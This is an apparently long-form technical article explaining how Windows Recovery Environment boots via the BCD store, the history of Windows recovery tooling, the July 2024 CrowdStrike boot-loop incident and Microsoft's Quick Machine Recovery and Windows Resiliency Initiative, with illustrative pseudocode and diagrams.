Think about the engineering. The recovery partition was where it should be. The Boot Configuration Data store pointed at the right winre.wim. The two-failed-boots trigger fired. The blue Safe Mode tile rendered. The keyboard input handler took keystrokes. The NTFS read-write driver inside WinRE deleted the bad channel file. The reboot succeeded. Every line of code in the recovery path behaved exactly as the engineers in Redmond had specified. The architecture did not break.

What broke was the architecture's central assumption: that a person would be sitting in front of the screen.

The assumption was a security choice as much as a usability choice, and that the cost of that choice was a denial-of-service event measured not in seconds of downtime but in person-days of triage. What follows: the WinRE architecture as it actually exists on every Windows 11 device today, the lineage that produced that architecture, the failure mode that priced the architecture's blind spot, and the Windows Resiliency Initiative that Microsoft began assembling in the months after the incident.

A second thesis follows from the first. Recoverability is a security property. A platform that cannot recover at scale cannot guarantee availability; a platform that cannot guarantee availability cannot keep its confidentiality and integrity promises either, because operations teams in the middle of a fleet-down event will eventually pull every encryption layer and every signing check that gets in their way. The two halves of the CIA triad we usually study -- confidentiality and integrity -- have spent decades crowding out the third. CrowdStrike forced the third one back onto the page.

If WinRE worked perfectly on July 19, 2024, what does it actually do? And how did a recovery primitive end up being the architecture's single point of human dependence? Those questions are next.

2. The Architecture: WinRE, `winre.wim`, `boot.sdi`, ReAgentC

Before we explain how WinRE failed at scale, we have to be precise about what WinRE is. Most engineers know it as the screen that appears after two bad boots. That description is correct and unhelpful. WinRE is a Windows Preinstallation Environment image -- winre.wim -- backed by a system deployment image ramdisk and managed by ReAgentC.exe, registered with the Windows Boot Manager via an entry in the Boot Configuration Data store [@ms-winre-tech-ref, @ms-reagentc, @ms-bcd]. Each of those four moving pieces does one job; together they make the recovery surface possible.

A small, self-contained Windows operating system used to install, deploy, and repair Windows desktop editions and Windows Server [@ms-winpe-intro]. WinPE is the substrate of Windows Setup, the install media's `boot.wim`, and `winre.wim`. The base image requires 512 MB of RAM and automatically reboots after 240 hours of continuous use on Windows 10 1803 and later [@ms-winpe-intro]. Originally released to manufacturing in 2002 by a Microsoft team that included Vijay Jayaseelan, Ryan Burkhardt, and Richard Bond [@wiki-winpe]. A small image-format file that the Windows Boot Manager uses to allocate a RAM disk into which a WIM image can be mounted at boot time. The WinRE BCD entry references `boot.sdi` through a `ramdiskoptions` element; the `osdevice` element then names `winre.wim` as the image to mount inside that RAM disk [@ms-bcd, @ms-winre-tech-ref]. The binary database that replaced `boot.ini` in Windows Vista. The BCD lives on the EFI System Partition on UEFI machines and is the data structure the boot manager reads to decide what to boot. Each entry is a typed collection of *elements* -- `device`, `osdevice`, `path`, `winpe`, `ramdiskoptions`, `recoverysequence`, and others -- manipulated with `bcdedit.exe` [@ms-bcd]. A dedicated GPT partition holding `winre.wim`, identified by partition Type ID `DE94BBA4-06D1-4D40-A16A-BFD50179D6AC` and recommended for placement immediately after the Windows partition. The minimum size is 300 MB, with 250 MB of free space recommended to accommodate future updates [@ms-uefi-gpt]. On Image Configuration Designer media, this partition is the default layout; clean Setup may instead use a `\Recovery\WindowsRE` folder inside the Windows partition [@ms-winre-tech-ref].

Restated in the order a practitioner encounters them on disk, the four pieces are:

The recovery partition. The default UEFI/GPT layout from the Image Configuration Designer places a Windows RE Tools partition after the Windows partition, sized to hold winre.wim with headroom for cumulative-update growth [@ms-uefi-gpt]. The GPT Type ID DE94BBA4-06D1-4D40-A16A-BFD50179D6AC lets bootmgr find the partition without depending on the Windows volume's drive letter. A \Recovery\WindowsRE folder inside the OS volume is an equally valid alternative; some OEMs use one, some the other.The variability is invisible at runtime: bootmgr follows the BCD, not the disk layout. But it matters at provisioning time. Always check reagentc /info after deployment to know which arrangement you have, because the Microsoft-recommended fix for "winre.wim is too small after a cumulative update" (KB5028997) depends on which partition the image lives in.
winre.wim. A customised WinPE image. The lineage goes back to Windows PE 1.0, RTMed in 2002 from Windows XP RTM [@wiki-winpe]. Today's winre.wim is built from Windows 10 / 11's WinPE 10 line and includes the recovery shell, Startup Repair, System Restore (when enabled on the host), command prompt, and a curated list of optional drivers. The base image still inherits the WinPE rules: 512 MB minimum RAM, 240-hour reboot cap on Windows 10 1803+ [@ms-winpe-intro].
boot.sdi. Sits on the recovery partition (or in \Recovery\WindowsRE\) and acts as a fixed-size container into which the boot manager creates a RAM disk at boot time [@ms-bcd].The .sdi extension stands for *System Deployment Image*, the same file format used by older Windows Deployment Services workflows in which a thin ramdisk holds a boot.wim for PXE installs. The RAM disk is where winre.wim is mounted. boot.sdi is small (a few megabytes), unmodifiable in normal operation, and one of the parsers later abused by the BitUnlocker chain [@ms-bitunlocker-blog]; we return to that in Section 9.
ReAgentC.exe. The in-box management tool. Microsoft Learn documents the supported switches: /info, /enable, /disable, /setreimage /Path <Folder>, /boottore, /setbootshelllink, and the now-deprecated /setosimage (no longer used on Windows 10 or later) [@ms-reagentc]. The same page notes that for offline operations on WinPE 2.x/3.x/4.x images, administrators must instead use Winrecfg.exe from the Windows Assessment and Deployment Kit -- a clue that the online mode of ReAgentC.exe predated the offline mode. The tool has shipped since at least Windows 7; the precise RTM month is not surfaced on Microsoft Learn today.The web is full of confident claims that ReAgentC.exe first shipped in Vista, Windows 7, or Windows 8. The safe attribution is "Windows 7 onwards" because that is the era when the recovery-partition + ReAgentC model became the supported default. Microsoft Learn does not name an exact ship version, and the AI summaries that do are inferring from circumstantial evidence [@ms-reagentc].

All four pieces have to cooperate at the worst possible moment: when the Windows partition refuses to boot. The question for the next section is the literal handoff. How does the firmware end up running winre.wim?

3. The Mechanism: How a WinRE Boot Actually Happens

There is a sentence that appears in dozens of TechNet-era guides and AI summaries: Windows boots WinRE by running winload.exe /recovery. That sentence is wrong. There is no /recovery switch on winload.efi or winload.exe. The BCD Boot Options Reference enumerates every legal element on a boot entry, and recoverysequence is one of them; a command-line switch with that name is not [@ms-bcd]. WinRE is selected through the BCD, not through a flag passed to the loader.

Note: The BCD Boot Options Reference defines every element on a boot entry: device, osdevice, path, description, recoverysequence, winpe, ramdisksdidevice, ramdisksdipath, and a few dozen others [@ms-bcd]. None of them is exposed as a winload.exe /recovery command-line flag. The recovery handoff happens entirely inside the boot manager, before winload.efi ever runs.

Walk the literal boot sequence on a UEFI machine [@ms-winre-tech-ref, @ms-bcd]:

Firmware passes control to bootmgfw.efi on the EFI System Partition. (On legacy BIOS, it would be bootmgr from the active partition.)
The boot manager reads the BCD store. There is one entry of type Windows Boot Manager and one or more entries of type Windows Boot Loader.
The OS loader entry carries an element called recoverysequence, set to the GUID of a separate BCD entry. That separate entry is the WinRE configuration.
On a normal boot, the boot manager loads the OS entry's path (\Windows\System32\winload.efi) against the OS volume named in device/osdevice, and winload.efi brings up the kernel.
On a recovery trigger -- two failed boots, a corrupted system file, an explicit reagentc /boottore, or the user choosing Restart from the Advanced Startup menu -- the boot manager instead follows recoverysequence to the WinRE entry.
The WinRE entry's elements look like this: winpe Yes, osdevice ramdisk=[recovery]\Recovery\WindowsRE\Winre.wim,{ramdiskoptionsguid}, device ramdisk=[recovery]\Recovery\WindowsRE\Winre.wim,{ramdiskoptionsguid}, and path \Windows\System32\Boot\winload.efi. The ramdiskoptions element it points to in turn carries ramdisksdidevice and ramdisksdipath (\Recovery\WindowsRE\boot.sdi).
The boot manager creates a RAM disk backed by boot.sdi, mounts winre.wim inside it, and starts winload.efi against that ramdisk. From winload.efi's point of view, the OS being booted is the one inside winre.wim. The kernel comes up in the RAM disk and presents the Windows RE entry-point UI.

flowchart TD F[UEFI firmware] --> BM[bootmgfw.efi on ESP] BM --> BCD[Read BCD store] BCD --> CHK{Trigger fired?} CHK -- No --> OS[OS loader entry, winload.efi, Windows partition] CHK -- Yes --> RS[Follow recoverysequence GUID] RS --> WRE[WinRE BCD entry: winpe Yes, osdevice ramdisk=...winre.wim] WRE --> RD[Allocate RAM disk from boot.sdi] RD --> MNT[Mount winre.wim into RAM disk] MNT --> WL[winload.efi loads WinPE kernel] WL --> UX[WinRE entry-point UI]

The five auto-trigger conditions are enumerated verbatim in the Windows RE Technical Reference [@ms-winre-tech-ref]:

Two consecutive failed attempts to start Windows.
Two consecutive unexpected shutdowns within two minutes of boot completion.
Two consecutive system reboots within two minutes of boot completion.
A Secure Boot error (except for issues related to Bootmgr.efi).
A BitLocker error on touch-only devices.

flowchart LR A[Two failed boots] --> ENT[Enter WinRE] B[Two unexpected shutdowns within 2 min of boot] --> ENT C[Two reboots within 2 min of boot] --> ENT D[Secure Boot error -- not Bootmgr.efi] --> ENT E[BitLocker error on touch-only device] --> ENT

Walking the BCD elements themselves makes the absence of any /recovery switch visible. Here is a minimal model of what the boot manager actually consumes.

{` // Paraphrased from the BCD Boot Options Reference. Real bcdedit output is text, // but the boot manager reads it as a typed key/value store.

const bcd = { bootmgr: { type: 'Windows Boot Manager', default: '{current}', displayorder: ['{current}'], }, '{current}': { type: 'Windows Boot Loader', device: 'partition=C:', osdevice: 'partition=C:', path: '\\Windows\\system32\\winload.efi', description: 'Windows 11', recoverysequence: '{a1b2-...-winre-guid}', recoveryenabled: 'Yes', }, '{a1b2-...-winre-guid}': { type: 'Windows Boot Loader', device: 'ramdisk=[\\Device\\HarddiskVolume4]\\Recovery\\WindowsRE\\Winre.wim,{ramdiskopts}', osdevice: 'ramdisk=[\\Device\\HarddiskVolume4]\\Recovery\\WindowsRE\\Winre.wim,{ramdiskopts}', path: '\\Windows\\system32\\Boot\\winload.efi', description: 'Windows Recovery Environment', winpe: 'Yes', nx: 'OptIn', }, '{ramdiskopts}': { type: 'Device Options', description: 'Ramdisk Options', ramdisksdidevice: 'partition=\\Device\\HarddiskVolume4', ramdisksdipath: '\\Recovery\\WindowsRE\\boot.sdi', }, };

// The boot manager picks one of these entries, depending on whether // recoverysequence has been activated. No command-line flag is involved.

const chosen = bootDecision(2, false, false); console.log('Loader path the boot manager invokes:'); console.log(' ' + chosen.path); console.log('Backing device:'); console.log(' ' + chosen.osdevice); console.log('winpe flag (Yes means "boot a WIM into a ramdisk"):'); console.log(' ' + (chosen.winpe || '(unset, normal OS boot)')); `}

That is the entire mechanism. Two failed boots flip an in-BCD counter; the boot manager follows recoverysequence instead of the default loader path; the WinRE entry mounts winre.wim in a RAM disk; the kernel inside winre.wim comes up. No flags, no shells, no scripts.

Now we know what WinRE is and how it boots. The remaining historical question is how this architecture came to be, and what about it did not change between 2007 and July 19, 2024.

4. Historical Origins: From the Recovery Console to the Recovery Partition (2000-2012)

Every architectural choice in WinRE was a response to something that did not work the year before. Walk the four pre-WRI generations of Windows recovery and the story is one long relaxation of the assumption that recovery requires physical media.

Generation 1: Emergency Repair Disk (NT 3.x and 4.0, 1993-2000)

A floppy disk plus a %SystemRoot%\repair directory contained snapshotted SYSTEM, SOFTWARE, SAM, and SECURITY registry hives [@wiki-recovery-console]. The administrator booted from the three Windows NT Setup floppies, pressed R for Repair, fed the floppy when prompted, and Setup wrote the snapshotted hives back over the damaged on-disk copies. ERD repaired the registry, nothing more. If NTOSKRNL.EXE itself was missing, the operator was reduced to a DOS floppy plus EXPAND from the install CD. The architecture's failure mode was the obvious one for a floppy-based snapshot system: the floppy got lost; the snapshot was stale; the scope was too narrow.

The Windows NT 3.x and 4.0 recovery mechanism: a snapshot of the registry hives written to a floppy by `RDISK.EXE` plus a small `%SystemRoot%\repair` folder. Restored only the registry; required the NT Setup floppies to boot. Wikipedia's *Recovery Console* article identifies the Recovery Console as ERD's successor [@wiki-recovery-console].

Generation 2: Recovery Console (Windows 2000, February 17, 2000)

The Recovery Console replaced the binary "restore the snapshot" decision with a programmable shell. Boot from the Windows 2000 or XP install CD; choose Repair; the operator landed in a cmd.exe-shaped environment with around three dozen internal commands: copy, del, attrib, chkdsk, fixboot, fixmbr, bootcfg, and the rest [@wiki-recovery-console]. Authentication required the local Administrator password; filesystem access was sharply constrained (read-only by default; on the boot volume only the root and %SystemRoot% were writable, unless Group Policy relaxed those limits).

The Windows 2000/XP/Server 2003 command-line repair shell. Initial release February 17, 2000; superseded by the Windows Recovery Environment in Windows Vista. Loadable from the install CD or installable as a startup option via `winnt32 /cmdcons`. Wikipedia lists Windows Recovery Environment as its named successor [@wiki-recovery-console].

The Recovery Console did not fail technically. It failed culturally. By 2005 the Windows administrator population had shifted decisively to GUI tools. A 2005 user with a corrupt WINLOAD.EXE and no install CD had no path to repair the box without buying replacement media. There was no automatic-repair logic and no on-disk presence; the install CD was always required, and every fix demanded muscle memory the typical administrator no longer had.

Generation 3: WinRE on Installation Media (Windows Vista, January 2007)

Vista shipped a full GUI recovery environment built on the brand-new Windows PE 2.0 [@wiki-winpe]. winre.wim carried Startup Repair (a probe-and-fix playbook for boot failures), System Restore (now backed by the Volume Shadow Copy Service), Complete PC Restore, Windows Memory Diagnostic, and a command prompt for the cases nothing else fit. Vista was also the version that introduced the Boot Configuration Data store and bootmgr, replacing NTLDR and the plain-text boot.ini [@ms-bcd]. The same BCD that today still routes the recovery handoff was written for Vista.The Microsoft Learn "Vista WinRE Overview" page in the previous-versions archive (cc766056) is now misdirected and renders an unrelated USMT migration topic instead of the original article. The load-bearing claim that WinRE was introduced in Vista is independently supported by the Windows PE Wikipedia article's version table (WinPE 2.0 built from Vista RTM) and by Microsoft Learn's Push-button reset overview, which dates Push-Button Reset to Windows 8 and frames it as built on the existing WinRE architecture [@wiki-winpe, @ms-pbr-overview].

Vista WinRE had two architectural problems that the next generation fixed. OEMs were free to put winre.wim wherever they wanted on disk; there was no standard partition. And the install DVD remained the fallback for any user whose OEM had not pre-installed WinRE -- which, by 2010, was most users, none of whom still owned the DVD.

System Restore is itself a sub-thread worth noting. It first shipped in Windows ME (year 2000), was re-implemented atop VSS in Vista, and remained off by default on Windows 10 and 11 [@wiki-system-restore]. The Vista move made it callable from WinRE even when the host Windows would not boot -- a property that, twenty-five years later, Point-in-Time Restore is re-engineering for the cloud.

Generation 4: Recovery Partition + ReAgentC + BCD `recoverysequence` (Windows 7, 2009; standardised in Windows 8 and beyond)

This is the architecture every Windows 11 device still runs.

Windows 7 dropped winre.wim onto a dedicated recovery partition with a GPT Type ID that lets bootmgr find it without depending on the Windows volume's drive letter [@ms-uefi-gpt]. ReAgentC.exe became the in-box management tool [@ms-reagentc]. The BCD recoverysequence element became the mechanism by which the OS loader entry points at the WinRE entry. The two-failed-boots trigger entered the Windows RE Technical Reference's enumeration of automatic conditions [@ms-winre-tech-ref].

Generation 4 did not fail. The five auto-trigger conditions still fire on Windows 11 24H2. ReAgentC's switches are still the supported management surface. The recovery-partition GPT Type ID is still DE94BBA4-06D1-4D40-A16A-BFD50179D6AC. It is the architectural floor every later generation extends, including Quick Machine Recovery.

What Generation 4 did not solve was the cost of recovery at fleet scale. WinRE-on-disk handled one machine perfectly; it had nothing to say about ten thousand machines, each still bounded by the time it took to walk to a desk.

gantt dateFormat YYYY axisFormat %Y section Pre-WinRE Emergency Repair Disk (NT 3.x / 4.0) :1993, 2000 Recovery Console (Windows 2000 onwards) :2000, 2008 section WinRE WinRE on installation media (Vista) :2007, 2009 Recovery partition + ReAgentC (still current) :2009, 2026 section Recovery flavours Push-Button Reset (Windows 8 onwards) :2012, 2026 Autopilot Reset (Win 10 1709) :2017, 2026 Quick Machine Recovery (24H2) :2025, 2026 Intune Remote Recovery / Cloud Rebuild :2025, 2026

A few parallel paths deserve naming. Push-Button Reset, introduced in Windows 8 in 2012, gave consumers an in-WinRE "Refresh" or "Reset"; image-less reset in Windows 10 and Cloud Download in Windows 10 version 2004 (May 2020) made the reset progressively less dependent on locally-staged install images [@ms-pbr-overview]. Autopilot Reset, shipped in Windows 10 1709 (October 2017), let Intune issue an MDM-initiated wipe-and-rebuild that preserved the device's Entra ID join. Microsoft Diagnostics and Recovery Toolset (DaRT) -- the descendant of Winternals ERD Commander acquired in 2006 and shipped under MDOP starting July 2007 (MDOP 2007), with subsequent releases through MDOP 2008 (April 2008) -- gave Software Assurance customers a richer enterprise tool on top of WinPE [@wiki-mdop-dart]. Older recovery mechanisms quietly aged out: Last Known Good Configuration was no longer the default boot-failure response on Windows 8 onward, and the deprecated-features lifecycle framework is the canonical place to track such retirements today [@ms-deprecated].

By the early 2010s, the architecture that still runs on every Windows 11 device today was largely in place [@ms-winre-tech-ref, @ms-reagentc]. None of these tools gave WinRE permission to call Windows Update from inside the recovery environment. That gap is the next chapter.

5. The Forcing Function: July 19, 2024

We know what WinRE is. We know how it boots. We can now see the CrowdStrike incident as the architecture's stress test. The headline numbers are well-rehearsed at this point; what matters here is the technical cause, the kernel-resident dependency it expressed, and the procedure Microsoft published.

The fault

CrowdStrike's Falcon sensor for Windows version 7.11, released in February 2024, introduced a new IPC Template Type used by behavioural detection logic [@crowdstrike-rca-pdf]. The Template Type declared twenty-one input parameter fields. The integration code that invoked the in-driver Content Interpreter to evaluate Template Instances against host activity supplied only twenty inputs [@crowdstrike-rca-pdf]. For more than four months, Channel File 291 contained no Template Instance whose criterion read the twenty-first field. That made the mismatch latent.

At 04:09 UTC on July 19, 2024, CrowdStrike pushed a new Channel File 291 containing a Template Instance that referenced the twenty-first field with a non-wildcard matching criterion [@crowdstrike-rca-pdf, @crowdstrike-tech-details]. The Content Interpreter loaded the instance, looked up the twenty-first input pointer in its input-pointer array, and read past the end of that array. Sensors running 7.11 or later that received the update between 04:09 and 05:27 UTC tripped the latent out-of-bounds read [@crowdstrike-tech-details].

The crash

Microsoft's Windows Error Reporting analysis, published in the security blog on July 27, 2024, recorded the global crash signature as nt!KeBugCheckEx followed by nt!KiPageFault and then csagent+0xe14ed, with r8=ffff840500000074 as the invalid pointer that the read tried to dereference [@ms-security-jul27]. Microsoft confirmed that the analysis matched CrowdStrike's own conclusion: a read-out-of-bounds memory safety error in the csagent.sys driver.

flowchart TD A[Falcon 7.11 ships in Feb 2024 with IPC Template Type declaring 21 fields] --> B[Integration code supplies only 20 inputs] B --> C[Latent OOB potential -- no instance references field 21] C --> D[July 19 04:09 UTC: new Channel File 291 adds non-wildcard 21st-field criterion] D --> E[Content Interpreter reads input-pointer index 20] E --> F[Page fault at csagent+0xe14ed] F --> G[nt!KiPageFault -> nt!KeBugCheckEx] G --> H[Bug check; system reboots] H --> I[csagent.sys reloads -- registered SERVICE_SYSTEM_START Start=1 -- bug check again] I --> J[Boot loop on 8.5 million endpoints]

The kernel-resident dependency

csagent.sys loaded early in boot. Microsoft's WER post-mortem shows the driver registered with REG_DWORD Start 1 -- the SERVICE_SYSTEM_START class, loaded by the kernel before user-mode comes up [@ms-security-jul27]. That placement is the entire point of a kernel-mode security agent: it has to instrument the kernel boundary at the moment user-mode would otherwise be invisible to it. The cost of that placement is that when an early-boot driver page-faults, the bug check happens before the operating system is interactive. The remediation -- delete C-00000291*.sys -- could not be issued from a running Windows, because there was no running Windows.

The fault dynamic above is easier to describe than it is to file. CrowdStrike's own technical-details post is explicit about the file-type distinction: "Although Channel Files end with the SYS extension, they are not kernel drivers" [@crowdstrike-tech-details]. The kernel-mode component is `csagent.sys`. The Channel Files in `C:\Windows\System32\drivers\CrowdStrike\` are *data* that the Content Interpreter inside `csagent.sys` reads. The fault was a bug in `csagent.sys`'s interpretation of a particular Channel File; both ends matter, and the file extension on the data file is incidental.

The recovery procedure

Microsoft published KB5042421 within hours [@ms-kb5042421]. The text reduced to three steps: boot to Safe Mode (which on Windows 11 means letting WinRE select Safe Mode from the Advanced startup options tree); delete C:\Windows\System32\drivers\CrowdStrike\C-00000291*.sys; reboot. For BitLocker-encrypted volumes the procedure had a fourth, preliminary step: surface the recovery key. KB5042421 walks the user through the Entra ID self-service flow at aka.ms/aadrecoverykey: log on from a phone, choose Manage Devices, View BitLocker Keys, Show recovery key [@ms-kb5042421].

The instruction was correct. It was also unambiguously per-machine.

We currently estimate that CrowdStrike's update affected 8.5 million Windows devices, or less than one percent of all Windows machines. -- Microsoft, *Helping our customers through the CrowdStrike outage*, July 20, 2024 [@ms-crowdstrike-jul20].

The bottleneck

Each device's recovery was a function of time-to-physical-access, plus time-to-BitLocker-key, plus time-to-keyboard. None of those terms scaled. A laptop on a desk that the owner happened to be near recovered in five minutes. A laptop on a desk where the owner was on holiday recovered when someone arrived to swipe their badge. A server in a remote data centre recovered when a hand reached the iLO or KVM. A point-of-sale device in a checked-bag-only baggage hall recovered when someone wheeled a USB keyboard out to it. Multiply by 8.5 million.

The architecture that delivered Safe Mode to every one of those devices did exactly what its 2009 specification said it would do. The architecture that delivered Safe Mode to every one of those devices left enterprises stranded for days. Both sentences are true. The contradiction is the whole point.

Note: WinRE booted correctly. The Safe Mode tile rendered. The two-failed-boots trigger fired. The recovery partition was where it should be. The BCD recoverysequence led to the right winre.wim. The keyboard handler took keystrokes. Every line of code did what it was specified to do. The single unwritten line of the specification -- one operator, please -- was the line that did not scale.

The instruction was correct, the procedure was published within hours, and the floor was on fire for days. The next question -- the one Microsoft was already being asked at WESES, the closed-door September 10, 2024 endpoint-security partner summit [@ms-weses] -- was whether the floor could not be on fire next time.

6. The Breakthrough: Quick Machine Recovery

Quick Machine Recovery, announced at Microsoft Ignite on November 19, 2024 [@ms-wri-ignite-2024] and generally available on Windows 11 24H2 build 26100.4700+ in August 2025 per the November 18, 2025 update [@ms-wri-ignite-2025], did not add any new technology to WinRE that had not been in WinPE since 2002. Networking drivers, DHCP clients, HTTPS stacks: all of these were already in winre.wim's base image, inherited from the WinPE Optional Components that have shipped with the OS for two decades [@ms-winpe-intro]. What QMR added was an answer to a question WinRE had never been asked: when you are inside the recovery environment with no operator at the keyboard, who do you call?

The Windows 11 24H2 feature, available on build 26100.4700 or later, that lets WinRE establish network connectivity from inside the recovery environment, query Windows Update for a remediation matching the current failure signature, download and apply that remediation, and reboot -- all without requiring an operator at the keyboard [@ms-qmr]. Announced at Microsoft Ignite on November 19, 2024 [@ms-wri-ignite-2024]; first shipped in Windows 11 Insider Preview build 26120.3653 on March 28, 2025 [@ms-qmr-insider-mar2025]; generally available in August 2025 [@ms-wri-ignite-2025].

The five-phase loop

Microsoft Learn documents QMR as five phases [@ms-qmr]:

Crash detection. The same two-failed-boots trigger already in the Windows RE Technical Reference [@ms-winre-tech-ref] fires the recovery path.
Boot to recovery. The existing BCD recoverysequence mechanism from Section 3 routes the system into WinRE.
Network connection. WinRE establishes wired Ethernet, or WPA/WPA2 password-based Wi-Fi using a credential pre-staged via reagentc.exe /SetRecoverySettings. As of the Microsoft Learn page's current wording, only wired and WPA/WPA2 password-based wireless are supported [@ms-qmr]; enterprise certificates and WPA3-Enterprise are on the November 18, 2025 roadmap but not yet shipped [@ms-wri-ignite-2025].
Remediation. The recovery environment scans Windows Update for a published remediation matching the device's failure signature, downloads it, and applies it.
Reboot. On success, the device boots normally. On no-match, the device can either present the manual recovery menu (the one-time scan mode, the default for unmanaged systems) or loop with a configurable interval (the looped mode) until either a remediation arrives or the operator-set total wait time expires [@ms-qmr].

sequenceDiagram participant D as Device (OS) participant W as WinRE participant N as Network participant WU as Windows Update participant O as OS partition D->>W: Two failed boots -> follow recoverysequence W->>N: Acquire Ethernet or WPA2 Wi-Fi W->>WU: Query for remediation matching failure signature WU-->>W: Remediation package (or "none found") alt Remediation available W->>O: Apply remediation to OS partition W->>D: Reboot D-->>D: Normal boot succeeds else None found, one-time mode W->>D: Present manual recovery menu else None found, looped mode W-->>W: Sleep wait_interval, retry until total_wait_time end

The default-on/off matrix

The Microsoft Learn QMR page is explicit on defaults [@ms-qmr]. Cloud remediation is enabled by default, with one-time scan auto-remediation, on systems that are not under enterprise management -- Windows Home and unmanaged Pro. It is disabled by default on enterprise-managed systems -- Windows Enterprise, Education, and managed Pro. The rationale follows from how those populations think: enterprise administrators want to gate cloud remediation behind their own deployment-ring process, and consumers benefit from the default-on behaviour because they do not have a ring process at all. The same Microsoft Learn page documents an Intune Settings Catalog policy under Remote Remediation > Enable Cloud Remediation for administrators who want to switch the policy on at the tenant level [@ms-qmr].

The test-mode flow

QMR ships with a dry-run mechanism. reagentc.exe /SetRecoveryTestmode configures the WinRE entry for a simulated recovery cycle; reagentc.exe /BootToRe triggers the cycle on the next reboot; the simulated remediation appears in Settings > Windows Update > Update history rather than mutating the production OS [@ms-qmr]. Microsoft suggests using the test mode to validate the per-device QMR configuration before relying on it in production.

The pseudocode

The five phases collapse into a short loop. The version below is paraphrased from the Microsoft Learn QMR page [@ms-qmr] and shows how the two settings interact.

{` // Paraphrased from the Microsoft Learn QMR specification.

const config = { cloud_remediation_enabled: true, // default on Home/unmanaged Pro auto_remediation_mode: 'looped', // 'one_time' | 'looped' total_wait_time_minutes: 60, wait_interval_minutes: 10, wifi: { ssid: 'corp-recovery', psk: '***', encryption: 'WPA2' }, };

function detectFailureSignature() { return { driver: 'csagent.sys', offset: '0xe14ed', signature: 'oob-read' }; }

function scanWindowsUpdate(signature) { if (signature.driver === 'csagent.sys' && signature.signature === 'oob-read') { return { id: 'qmr-csagent-291', action: 'delete', path: 'C\\Windows\\System32\\drivers\\CrowdStrike\\C-00000291*.sys' }; } return null; }

function qmrEnterRecovery() { console.log('Phase 1: crash detected (two failed boots)'); console.log('Phase 2: booted into WinRE via BCD recoverysequence');

if (!config.cloud_remediation_enabled) { console.log('Cloud remediation disabled; falling back to Startup Repair'); return; }

console.log('Phase 3: acquiring network (' + config.wifi.encryption + ' Wi-Fi)'); const sig = detectFailureSignature(); let elapsed = 0;

while (true) { console.log('Phase 4: scanning Windows Update for remediation matching ' + sig.driver); const remediation = scanWindowsUpdate(sig); if (remediation) { console.log(' -> Applying ' + remediation.id + ' (delete ' + remediation.path + ')'); console.log('Phase 5: reboot into repaired Windows'); return; } if (config.auto_remediation_mode === 'one_time') { console.log('No remediation found; presenting manual recovery menu'); return; } elapsed += config.wait_interval_minutes; if (elapsed >= config.total_wait_time_minutes) { console.log('Looped mode exhausted; falling back to manual recovery menu'); return; } console.log(' -> No match; sleeping ' + config.wait_interval_minutes + ' min'); } }

qmrEnterRecovery(); `}

The counterfactual

Had QMR existed on July 19, 2024, the per-device labour would have been zero. Microsoft and CrowdStrike would have published a Windows Update remediation that deletes C-00000291*.sys; every affected device would have entered WinRE on its second failed boot, picked up the remediation, applied it, and rebooted. The 8.5-million-device fleet cost would have collapsed from operator-days to network-minutes. The CrowdStrike RCA published August 6, 2024 documents that the fault-to-rollback time was 78 minutes [@crowdstrike-tech-details, @crowdstrike-rca-pdf]; QMR would have made time-to-rollback and time-to-fleet-recovery the same number, plus the per-device Windows Update transit. That is the empirical case Microsoft is making.

Key idea: Quick Machine Recovery did not add new technology to WinRE. It added a question. WinRE has always had networking drivers; it had never been told it had permission to phone home. The technical innovation is policy, not code -- the Windows Update endpoint framing is a commitment that the recovery environment may, in well-defined circumstances, act on behalf of the operator who is not there.

QMR re-priced the per-device cost of recovery from O(N) to roughly O(1). But QMR alone does not explain why Microsoft is calling this the Windows Resiliency Initiative rather than the Quick Machine Recovery Release. The next section unpacks the five layers WRI puts around QMR.

7. The Program: The Windows Resiliency Initiative as Five Layers

WRI is not one feature. It is a layered program. Each layer is a Microsoft-named deliverable with a Microsoft-cited source. The temptation, on reading any single WRI blog post, is to confuse the layer with the program. The layers are concentric. They are also dated.

Walk the five layers. Each has a Microsoft term, a primary anchor, and a published status as of November 18, 2025.

Layer	Microsoft term	Anchor	Status as of Nov 18, 2025
Prevent: stop bad updates leaving the partner	Safe Deployment Practices (SDP), part of MVI 3.0	[@ms-wri-ignite-2024], [@ms-mvi], [@ms-wri-jun-2025]	Effective April 1, 2025 [@ms-wri-ignite-2025]
Prevent: stop bad code being kernel-resident	Windows endpoint security platform (user-mode antivirus)	[@ms-wri-ignite-2024], [@ms-wri-jun-2025], [@ms-wri-ignite-2025]	Private preview July 2025; named partners in [@ms-wri-jun-2025]
Manage: see the incident at scale	Intune surfaces WinRE state; Mission Critical Services for Windows	[@ms-wri-ignite-2025]	Coming soon
Recover: heal the unbootable machine	Quick Machine Recovery	[@ms-wri-ignite-2024], [@ms-qmr], [@ms-wri-ignite-2025]	GA August 2025
Recover: rebuild without shipping hardware	Point-in-Time Restore, Cloud Rebuild, Windows 365 Reserve	[@ms-wri-ignite-2025]	PITR Insider preview Nov 2025; W365R GA; Cloud Rebuild coming

flowchart LR subgraph L1[1. Prevent: stop bad updates at the partner -- MVI 3.0 SDP] subgraph L2[2. Prevent: stop bad code being kernel-resident -- user-mode AV platform] subgraph L3[3. Manage: see the incident at scale -- Intune surfaces WinRE state] subgraph L4[4. Recover the unbootable: Quick Machine Recovery] subgraph L5[5. Rebuild without shipping hardware: PITR / Cloud Rebuild / W365 Reserve] CORE[Windows endpoint -- recoverable at fleet scale] end end end end end

Layer 1: Safe Deployment Practices and MVI 3.0

Microsoft Virus Initiative 3.0 became effective on April 1, 2025 [@ms-wri-ignite-2025]. Membership now requires partners to commit to four named obligations [@ms-mvi]: a signed nondisclosure agreement; use of Microsoft Trusted Signing (the hosted descendant of Authenticode) for AV/EDR driver code-signing; documented Safe Deployment Practices for content updates (gradual rollouts with deployment rings and monitoring); and certification within the last 12 months by at least one of AV-Comparatives, AVLab Cybersecurity Foundation, AV-Test, MRG Effitas, SE Labs, SKD Labs, VB 100, or West Coast Labs [@ms-mvi]. The June 26, 2025 WRI update lists eight named partner endorsements -- Bitdefender (Florin Virlan), CrowdStrike (Alex Ionescu), ESET (Juraj Malcho), SentinelOne (Stefan Krantz), Sophos (John Peterson), Trellix (Jim Treinen), Trend Micro (Rachel Jin), and WithSecure (Johannes Rave) -- and the November 18, 2025 update confirms the effective date verbatim: "Effective April 1, 2025, Version 3.0 of the Microsoft Virus Initiative added new requirements for all Windows antivirus (AV) partners to maintain signing rights for Windows AV drivers" [@ms-wri-jun-2025, @ms-wri-ignite-2025].

